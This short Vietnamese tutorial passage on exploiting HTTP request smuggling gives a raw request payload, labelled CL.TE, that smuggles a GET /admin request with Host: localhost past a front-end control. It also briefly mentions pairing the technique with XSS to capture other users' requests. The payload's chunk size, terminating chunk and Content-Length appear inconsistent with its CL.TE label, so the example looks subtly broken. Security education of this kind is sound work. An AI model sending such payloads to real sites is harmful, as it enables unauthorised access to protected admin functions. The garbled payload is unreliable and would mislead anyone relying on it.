Khai thác lỗ hổng HTTP request smuggling
Khi xác nhận lỗ hổng request smuggling, chúng ta có thể khai thác theo nhiều cách tùy thuộc vào hành vi của ứng dụng.
Bypassing front-end security controls
Chúng ta có thể sử dụng request smuggling để bypass kiểm soát bảo mật front-end, ví dụ như kiểm tra quyền truy cập.
Giả sử front-end chặn request đến /admin nhưng back-end không, chúng ta có thể smuggling request để truy cập.
Ví dụ với CL.TE:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 44
Transfer-Encoding: chunked
b
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
0
GET / HTTP/1.1
Back-end sẽ xử lý request độc hại như GET /admin từ localhost.
Phát hiện lại request của người dùng khác
Kết hợp với XSS để phát hiện request của người dùng khác.